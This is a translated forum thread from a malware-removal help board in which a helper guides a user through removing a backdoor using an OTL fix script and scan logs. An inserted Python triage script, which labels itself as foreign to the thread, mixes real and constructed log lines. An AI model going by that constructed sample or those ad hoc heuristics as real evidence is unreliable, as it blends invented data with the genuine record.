This session lasted 11368 seconds with 1020 seconds of active time. This session ended with a crash. Error - 15.06.2012 05:27:36 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001 Description = ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 10 seconds with 0 seconds of active time. This session ended with a crash. Error - 11.09.2012 10:42:12 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001 Description = ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1055 seconds with 960 seconds of active time. This session ended with a crash. Error - 11.09.2012 11:20:17 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001 Description = ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2260 seconds with 1500 seconds of active time. This session ended with a crash. Error - 11.03.2013 09:29:25 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001 Description = ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3508 seconds with 2040 seconds of active time. This session ended with a crash. 
[ System Events ] Error - 14.08.2009 16:07:32 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20 Description = Error - 15.08.2009 13:08:09 | Computer Name = ant-PC | Source = HTTP | ID = 15016 Description = Error - 15.08.2009 13:09:04 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000 Description = Error - 15.08.2009 13:13:45 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20 Description = Error - 15.08.2009 19:24:03 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20 Description = Error - 16.08.2009 15:56:43 | Computer Name = ant-PC | Source = HTTP | ID = 15016 Description = Error - 16.08.2009 15:57:10 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000 Description = Error - 16.08.2009 18:05:00 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20 Description = Error - 17.08.2009 03:11:20 | Computer Name = ant-PC | Source = HTTP | ID = 15016 Description = Error - 17.08.2009 03:11:42 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000 Description = < End of report > |
04.06.2013, 16:30 | #2 |
/// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Hi,
__________________otl fix Fix with OTL
Code:
ATTFilter
:OTL
O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat ()
[2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo
[2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe
:files
:Commands
[emptytemp]
Note: Please also upload the file there, as described in the UpChannel instructions. Please do NOT post the ZIP file here as an attachment in the thread! Please press the + E key.
__________________ |
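The entries picked out in the OTL fix script above share traits that can be checked mechanically when triaging such a log: a per-user Run value pointing at a script inside the profile, several identically sized executables without a company name in the profile root, and a file name that closely imitates svchost.exe. The following Python is an added example, not part of the thread or of OTL; the heuristics, the 0.85 similarity threshold and all function names are assumptions, and the sample mixes lines from the fix script with constructed ones (marked in the code).

```python
import re
from collections import defaultdict
from difflib import SequenceMatcher
from ntpath import basename, dirname  # Windows path rules on any OS

# Lines 1 and 3-7 are taken from the fix script in the thread; lines 2 and 8-10
# (ExampleVendor, System32, the scvhost.exe size and timestamp) are constructed.
SAMPLE_LOG = r"""
O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat ()
O4 - HKLM..\Run: [ExampleTray] C:\Program Files\ExampleVendor\tray.exe (ExampleVendor)
[2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo
[2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.19 21:22:16 | 000,123,456 | ---- | C] () -- C:\Users\ant\AppData\Roaming\pejo\scvhost.exe
[2013.01.01 12:00:00 | 000,021,504 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe
[2013.01.01 12:00:00 | 000,012,345 | ---- | M] (ExampleVendor) -- C:\Users\ant\setup_example.exe
"""

# "O4 - <hive>..\Run: [<value>] <target> (<company>)"
RUN_RE = re.compile(r"^O4 - (HKCU|HKLM)\.\.\\Run: \[(.+?)\] (.+) \(([^()]*)\)$")
# "[<date time> | <size> | <attrs> | C/M] (<company>) -- <path>"; directories carry no "()"
FILE_RE = re.compile(
    r"^\[([\d.]+ [\d:]+) \| ([\d,]+) \| (\S{4}) \| ([CM])\] (?:\(([^()]*)\) )?-- (.+)$"
)
IN_PROFILE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+(\\|$)", re.I)
PROFILE_ROOT_RE = re.compile(r"^[a-z]:\\users\\[^\\]+$", re.I)
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js")
SYSTEM_NAMES = ("svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "explorer.exe")


def lookalike(path, threshold=0.85):
    """Return the system binary name that the file name imitates, or None."""
    name = basename(path).lower()
    if name in SYSTEM_NAMES:          # exact names are not look-alikes
        return None
    for sys_name in SYSTEM_NAMES:
        if SequenceMatcher(None, name, sys_name).ratio() >= threshold:
            return sys_name
    return None


def triage(log_text):
    """Return a list of (kind, subject, detail) findings for OTL-style lines."""
    findings = []
    no_vendor_by_size = defaultdict(list)   # size -> exe paths in a profile root

    for raw in log_text.splitlines():
        line = raw.strip()
        run = RUN_RE.match(line)
        if run:
            _hive, _value, target, company = run.groups()
            reasons = []
            if IN_PROFILE_RE.match(target):
                reasons.append("target inside a user profile")
            if target.lower().endswith(SCRIPT_EXT):
                reasons.append("target is a script")
            if not company:
                reasons.append("no company name")
            if len(reasons) >= 2:           # one trait alone is common and benign
                findings.append(("autorun", target, reasons))
            imitated = lookalike(target)
            if imitated:
                findings.append(("lookalike_name", target, imitated))
            continue

        entry = FILE_RE.match(line)
        if not entry:
            continue
        _stamp, size, attrs, _kind, company, path = entry.groups()
        if "D" in attrs:                    # directory entry, nothing to score
            continue
        imitated = lookalike(path)
        if imitated:
            findings.append(("lookalike_name", path, imitated))
        if (PROFILE_ROOT_RE.match(dirname(path))
                and path.lower().endswith(".exe") and not company):
            no_vendor_by_size[int(size.replace(",", ""))].append(path)

    # The same byte count under several unrelated names suggests one dropped payload.
    for size, paths in no_vendor_by_size.items():
        if len(paths) >= 2:
            findings.append(("same_size_cluster", size, paths))
    return findings


if __name__ == "__main__":
    for kind, subject, detail in triage(SAMPLE_LOG):
        print(kind, subject, detail, sep=" | ")
```
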
04.06.2013, 16:32 | #3 |
| Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Thank you very much for the quick reply!
__________________ |
04.06.2013, 16:34 | #4 |
/// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" see above
__________________ -Please forward suspicious e-mails to us for analysis: markusg.trojaner-board@web.de Forward Instructions: http://markusg.trojaner-board.de For now, please forward e-mails to markusg.trojaner-board@web.de as described in the instructions above If you would like to support us |
04.06.2013, 19:57 | #5 |
/// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Thanks for uploading. Please download TDSSKiller.exe and save this file to the desktop
__________________ |
04.06.2013, 20:02 | #6 |
| Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" First of all, thanks again! The upload seems to have worked; here is what was in the OTL txt file: Code:
ATTFilter
All processes killed
========== OTL ==========
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\pejo deleted successfully.
C:\Users\ant\AppData\Roaming\pejo\vifier.bat moved successfully.
C:\Users\ant\AppData\Roaming\pejo folder moved successfully.
C:\Users\ant\5rfakc72togyi.exe moved successfully.
C:\Users\ant\5pyizgdrc5biy.exe moved successfully.
C:\Users\ant\q8x93h4akie10.exe moved successfully.
C:\Users\ant\9gghzlvklvp08.exe moved successfully.
========== FILES ==========
========== COMMANDS ==========
[EMPTYTEMP]
User: All Users
User: ant
->Temp folder emptied: 269444850 bytes
->Temporary Internet Files folder emptied: 715667129 bytes
->Java cache emptied: 50464479 bytes
->Google Chrome cache emptied: 6059044 bytes
->Apple Safari cache emptied: 0 bytes
->Flash cache emptied: 2764 bytes
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Flash cache emptied: 75 bytes
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
User: Public
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 434011083 bytes
RecycleBin emptied: 7998116828 bytes
Total Files Cleaned = 9.035,00 mb
OTL by OldTimer - Version 3.2.69.0 log created on 06042013_185259
Files\Folders moved on Reboot...
PendingFileRenameOperations files...
Registry entries deleted on Reboot...
1. When I tried to zip the Moved Files folder, I got an error message from Avira; I could only zip it after I deactivated the "real-time scanner". I assume that is normal?
2. Since Malwarebytes Anti-Malware quarantined scvhost.exe, I get an icon/notification in the taskbar called "Blocked startup programs". Could this be because it still somehow wants to run this file when Windows starts, even though it no longer exists?
3. Could you say anything about what type of malware this was? (virus, worm, etc...) I would be interested, if it can be classified that easily...
Thanks! EDIT: I only saw your post after writing mine, I'll do that right away... |
04.06.2013, 20:04 | #7 |
/// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" a backdoor, so change all passwords later; continue with the previous post, TDSSKiller; in the end all problems should be resolved, but a little more patience :-)
__________________ |
04.06.2013, 20:32 | #8 |
| Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Oh dear... great... well, I hope you can get the problem solved, thank you very much for the quick and good help! So here is the log: Code:
ATTFilter 21:10:01.0148 4288 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42 21:10:01.0195 4288 ============================================================ 21:10:01.0195 4288 Current date / time: 2013/06/04 21:10:01.0195 21:10:01.0195 4288 SystemInfo: 21:10:01.0195 4288 21:10:01.0195 4288 OS Version: 6.0.6002 ServicePack: 2.0 21:10:01.0195 4288 Product type: Workstation 21:10:01.0195 4288 ComputerName: ANT-PC 21:10:01.0195 4288 UserName: ant 21:10:01.0195 4288 Windows directory: C:\Windows 21:10:01.0195 4288 System windows directory: C:\Windows 21:10:01.0195 4288 Processor architecture: Intel x86 21:10:01.0195 4288 Number of processors: 2 21:10:01.0195 4288 Page size: 0x1000 21:10:01.0195 4288 Boot type: Normal boot 21:10:01.0195 4288 ============================================================ 21:10:02.0302 4288 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050 21:10:02.0302 4288 ============================================================ 21:10:02.0302 4288 \Device\Harddisk0\DR0: 21:10:02.0302 4288 MBR partitions: 21:10:02.0302 4288 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x1388800, BlocksNum 0xDF21800 21:10:02.0302 4288 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0xF2AA000, BlocksNum 0xDF1B000 21:10:02.0302 4288 ============================================================ 21:10:02.0334 4288 C: <-> \Device\Harddisk0\DR0\Partition1 21:10:02.0380 4288 D: <-> \Device\Harddisk0\DR0\Partition2 21:10:02.0380 4288 ============================================================ 21:10:02.0380 4288 Initialize success 21:10:02.0380 4288 ============================================================ 21:10:11.0023 4344 ============================================================ 21:10:11.0023 4344 Scan started 21:10:11.0023 4344 Mode: Manual; SigCheck; TDLFS; 21:10:11.0023 4344 
============================================================ 21:10:12.0442 4344 ================ Scan system memory ======================== 21:10:12.0442 4344 System memory - ok 21:10:12.0442 4344 ================ Scan services ============================= 21:10:12.0709 4344 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys 21:10:12.0849 4344 ACPI - ok 21:10:12.0943 4344 [ F040037B149FD0F5A5044AE563390FA7 ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe 21:10:12.0958 4344 AdobeFlashPlayerUpdateSvc - ok 21:10:13.0005 4344 [ 04F0FCAC69C7C71A3AC4EB97FAFC8303 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys 21:10:13.0036 4344 adp94xx - ok 21:10:13.0052 4344 [ 60505E0041F7751BDBB80F88BF45C2CE ] adpahci C:\Windows\system32\drivers\adpahci.sys 21:10:13.0083 4344 adpahci - ok 21:10:13.0099 4344 [ 8A42779B02AEC986EAB64ECFC98F8BD7 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys 21:10:13.0114 4344 adpu160m - ok 21:10:13.0145 4344 [ 241C9E37F8CE45EF51C3DE27515CA4E5 ] adpu320 C:\Windows\system32\drivers\adpu320.sys 21:10:13.0161 4344 adpu320 - ok 21:10:13.0208 4344 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll 21:10:13.0348 4344 AeLookupSvc - ok 21:10:13.0426 4344 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys 21:10:13.0489 4344 AFD - ok 21:10:13.0551 4344 [ 13F9E33747E6B41A3FF305C37DB0D360 ] agp440 C:\Windows\system32\drivers\agp440.sys 21:10:13.0567 4344 agp440 - ok 21:10:13.0613 4344 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys 21:10:13.0629 4344 aic78xx - ok 21:10:13.0645 4344 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe 21:10:13.0816 4344 ALG - ok 21:10:13.0847 4344 [ 9EAEF5FC9B8E351AFA7E78A6FAE91F91 ] aliide C:\Windows\system32\drivers\aliide.sys 21:10:13.0879 4344 aliide - ok 21:10:13.0988 4344 AMD FUEL Service - ok 21:10:14.0050 4344 [ 
9FE76D783A7D47965D086A220B54277B ] AMD Reservation Manager C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe 21:10:14.0081 4344 AMD Reservation Manager - ok 21:10:14.0128 4344 [ C47344BC706E5F0B9DCE369516661578 ] amdagp C:\Windows\system32\drivers\amdagp.sys 21:10:14.0175 4344 amdagp - ok 21:10:14.0191 4344 [ 9B78A39A4C173FDBC1321E0DD659B34C ] amdide C:\Windows\system32\drivers\amdide.sys 21:10:14.0222 4344 amdide - ok 21:10:14.0237 4344 [ FF258424F0B2EF25EB98F04EE386E6E3 ] amdiox86 C:\Windows\system32\DRIVERS\amdiox86.sys 21:10:14.0269 4344 amdiox86 - ok 21:10:14.0284 4344 [ 18F29B49AD23ECEE3D2A826C725C8D48 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys 21:10:14.0347 4344 AmdK7 - ok 21:10:14.0362 4344 [ 93AE7F7DD54AB986A6F1A1B37BE7442D ] AmdK8 C:\Windows\system32\DRIVERS\amdk8.sys 21:10:14.0409 4344 AmdK8 - ok 21:10:14.0518 4344 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe 21:10:14.0534 4344 AntiVirSchedulerService - ok 21:10:14.0581 4344 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe 21:10:14.0596 4344 AntiVirService - ok 21:10:14.0643 4344 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll 21:10:14.0690 4344 Appinfo - ok 21:10:14.0783 4344 [ A5299D04ED225D64CF07A568A3E1BF8C ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe 21:10:14.0799 4344 Apple Mobile Device - ok 21:10:14.0846 4344 [ 5D2888182FB46632511ACEE92FDAD522 ] arc C:\Windows\system32\drivers\arc.sys 21:10:14.0861 4344 arc - ok 21:10:14.0893 4344 [ 5E2A321BD7C8B3624E41FDEC3E244945 ] arcsas C:\Windows\system32\drivers\arcsas.sys 21:10:14.0908 4344 arcsas - ok 21:10:14.0939 4344 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys 21:10:14.0986 4344 AsyncMac - ok 21:10:15.0017 4344 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi 
C:\Windows\system32\drivers\atapi.sys 21:10:15.0033 4344 atapi - ok 21:10:15.0095 4344 [ B886D349AFAD502DE4F6EA0C64B1CC4D ] Ati External Event Utility C:\Windows\system32\Ati2evxx.exe 21:10:15.0205 4344 Ati External Event Utility - ok 21:10:15.0361 4344 [ 8AE1745BFC7D383DAA3F82FE8D7BE7C0 ] atikmdag C:\Windows\system32\DRIVERS\atikmdag.sys 21:10:15.0595 4344 atikmdag - ok 21:10:15.0657 4344 [ 4AA1EB65481C392955939E735D27118B ] AtiPcie C:\Windows\system32\DRIVERS\AtiPcie.sys 21:10:15.0688 4344 AtiPcie - ok 21:10:15.0766 4344 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll 21:10:15.0797 4344 AudioEndpointBuilder - ok 21:10:15.0813 4344 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll 21:10:15.0844 4344 Audiosrv - ok 21:10:15.0953 4344 [ C143C69E089C7A13520EAF06175B3A3B ] AVerAF35 C:\Windows\system32\Drivers\AVerAF35.sys 21:10:16.0094 4344 AVerAF35 - ok 21:10:16.0156 4344 [ A33C07F7527FC4CBC664C3137EB7D744 ] AVerRemote C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe 21:10:16.0172 4344 AVerRemote ( UnsignedFile.Multi.Generic ) - warning 21:10:16.0172 4344 AVerRemote - detected UnsignedFile.Multi.Generic (1) 21:10:16.0219 4344 [ 9AEBB2D487D9BF4C0F354899D842EDD0 ] AVerScheduleService C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe 21:10:16.0234 4344 AVerScheduleService ( UnsignedFile.Multi.Generic ) - warning 21:10:16.0234 4344 AVerScheduleService - detected UnsignedFile.Multi.Generic (1) 21:10:16.0265 4344 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys 21:10:16.0281 4344 avgntflt - ok 21:10:16.0343 4344 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys 21:10:16.0375 4344 avipbb - ok 21:10:16.0406 4344 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys 21:10:16.0421 4344 avkmgr - ok 21:10:16.0499 4344 [ 502F1C30BD50B32D00CE4DCAECC3D3C7 ] b57nd60x 
C:\Windows\system32\DRIVERS\b57nd60x.sys 21:10:16.0562 4344 b57nd60x - ok 21:10:16.0640 4344 [ 825F81A6F7DD073509DB101F0BA6DC59 ] BBSvc C:\Program Files\Microsoft\BingBar\BBSvc.EXE 21:10:16.0655 4344 BBSvc - ok 21:10:16.0733 4344 [ E22ABCAA7B6FF580FEB0D49545DC4263 ] BCM43XV C:\Windows\system32\DRIVERS\bcmwl6.sys 21:10:16.0889 4344 BCM43XV - ok 21:10:16.0952 4344 [ E22ABCAA7B6FF580FEB0D49545DC4263 ] BCM43XX C:\Windows\system32\DRIVERS\bcmwl6.sys 21:10:17.0014 4344 BCM43XX - ok 21:10:17.0045 4344 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys 21:10:17.0092 4344 Beep - ok 21:10:17.0155 4344 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll 21:10:17.0186 4344 BFE - ok 21:10:17.0264 4344 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll 21:10:17.0389 4344 BITS - ok 21:10:17.0435 4344 [ D4DF28447741FD3D953526E33A617397 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys 21:10:17.0467 4344 blbdrive - ok 21:10:17.0576 4344 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe 21:10:17.0623 4344 Bonjour Service - ok 21:10:17.0685 4344 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys 21:10:17.0732 4344 bowser - ok 21:10:17.0810 4344 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys 21:10:17.0857 4344 BrFiltLo - ok 21:10:17.0888 4344 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys 21:10:17.0950 4344 BrFiltUp - ok 21:10:17.0981 4344 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll 21:10:18.0028 4344 Browser - ok 21:10:18.0059 4344 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys 21:10:18.0247 4344 Brserid - ok 21:10:18.0278 4344 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys 21:10:18.0340 4344 BrSerWdm - ok 21:10:18.0371 4344 [ 
BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys 21:10:18.0449 4344 BrUsbMdm - ok 21:10:18.0465 4344 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys 21:10:18.0527 4344 BrUsbSer - ok 21:10:18.0559 4344 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys 21:10:18.0621 4344 BTHMODEM - ok 21:10:18.0668 4344 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys 21:10:18.0715 4344 cdfs - ok 21:10:18.0746 4344 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys 21:10:18.0793 4344 cdrom - ok 21:10:18.0839 4344 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll 21:10:18.0902 4344 CertPropSvc - ok 21:10:18.0917 4344 [ E5D4133F37219DBCFE102BC61072589D ] circlass C:\Windows\system32\drivers\circlass.sys 21:10:18.0964 4344 circlass - ok 21:10:19.0011 4344 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys 21:10:19.0042 4344 CLFS - ok 21:10:19.0089 4344 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 21:10:19.0105 4344 clr_optimization_v2.0.50727_32 - ok 21:10:19.0198 4344 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 21:10:19.0307 4344 clr_optimization_v4.0.30319_32 - ok 21:10:19.0354 4344 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys 21:10:19.0401 4344 CmBatt - ok 21:10:19.0417 4344 [ 0CA25E686A4928484E9FDABD168AB629 ] cmdide C:\Windows\system32\drivers\cmdide.sys 21:10:19.0432 4344 cmdide - ok 21:10:19.0448 4344 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys 21:10:19.0463 4344 Compbatt - ok 21:10:19.0479 4344 COMSysApp - ok 21:10:19.0495 4344 [ 741E9DFF4F42D2D8477D0FC1DC0DF871 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys 
C:\Windows\system32\drivers\ulsata.sys 21:10:44.0065 4344 UlSata - ok 21:10:44.0080 4344 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys 21:10:44.0096 4344 ulsata2 - ok 21:10:44.0111 4344 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys 21:10:44.0158 4344 umbus - ok 21:10:44.0174 4344 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll 21:10:44.0221 4344 upnphost - ok 21:10:44.0283 4344 [ 32DB9517628FF0D070682AAB61E688F0 ] usbaudio C:\Windows\system32\drivers\usbaudio.sys 21:10:44.0330 4344 usbaudio - ok 21:10:44.0377 4344 [ 9419FAAC6552A51542DBBA02971C841C ] usbbus C:\Windows\system32\DRIVERS\lgusbbus.sys 21:10:44.0408 4344 usbbus - ok 21:10:44.0439 4344 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys 21:10:44.0470 4344 usbccgp - ok 21:10:44.0501 4344 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys 21:10:44.0579 4344 usbcir - ok 21:10:44.0626 4344 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys 21:10:44.0673 4344 usbehci - ok 21:10:44.0689 4344 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys 21:10:44.0735 4344 usbhub - ok 21:10:44.0751 4344 [ CE697FEE0D479290D89BEC80DFE793B7 ] usbohci C:\Windows\system32\DRIVERS\usbohci.sys 21:10:44.0782 4344 usbohci - ok 21:10:44.0829 4344 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys 21:10:44.0876 4344 usbprint - ok 21:10:44.0938 4344 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys 21:10:44.0969 4344 usbscan - ok 21:10:45.0001 4344 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS 21:10:45.0032 4344 USBSTOR - ok 21:10:45.0047 4344 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys 21:10:45.0094 4344 usbuhci - ok 21:10:45.0110 4344 [ 
E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys 21:10:45.0141 4344 usbvideo - ok 21:10:45.0188 4344 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll 21:10:45.0235 4344 UxSms - ok 21:10:45.0281 4344 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe 21:10:45.0375 4344 vds - ok 21:10:45.0406 4344 [ 87B06E1F30B749A114F74622D013F8D4 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys 21:10:45.0453 4344 vga - ok 21:10:45.0453 4344 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys 21:10:45.0500 4344 VgaSave - ok 21:10:45.0531 4344 [ 5D7159DEF58A800D5781BA3A879627BC ] viaagp C:\Windows\system32\drivers\viaagp.sys 21:10:45.0547 4344 viaagp - ok 21:10:45.0562 4344 [ C4F3A691B5BAD343E6249BD8C2D45DEE ] ViaC7 C:\Windows\system32\drivers\viac7.sys 21:10:45.0593 4344 ViaC7 - ok 21:10:45.0609 4344 [ AADF5587A4063F52C2C3FED7887426FC ] viaide C:\Windows\system32\drivers\viaide.sys 21:10:45.0625 4344 viaide - ok 21:10:45.0656 4344 [ AE01E1ED5A81E0D268B91B4A6DE5A872 ] VNUSB C:\Windows\system32\DRIVERS\VNUSB.sys 21:10:45.0687 4344 VNUSB ( UnsignedFile.Multi.Generic ) - warning 21:10:45.0687 4344 VNUSB - detected UnsignedFile.Multi.Generic (1) 21:10:45.0703 4344 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys 21:10:45.0718 4344 volmgr - ok 21:10:45.0765 4344 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys 21:10:45.0796 4344 volmgrx - ok 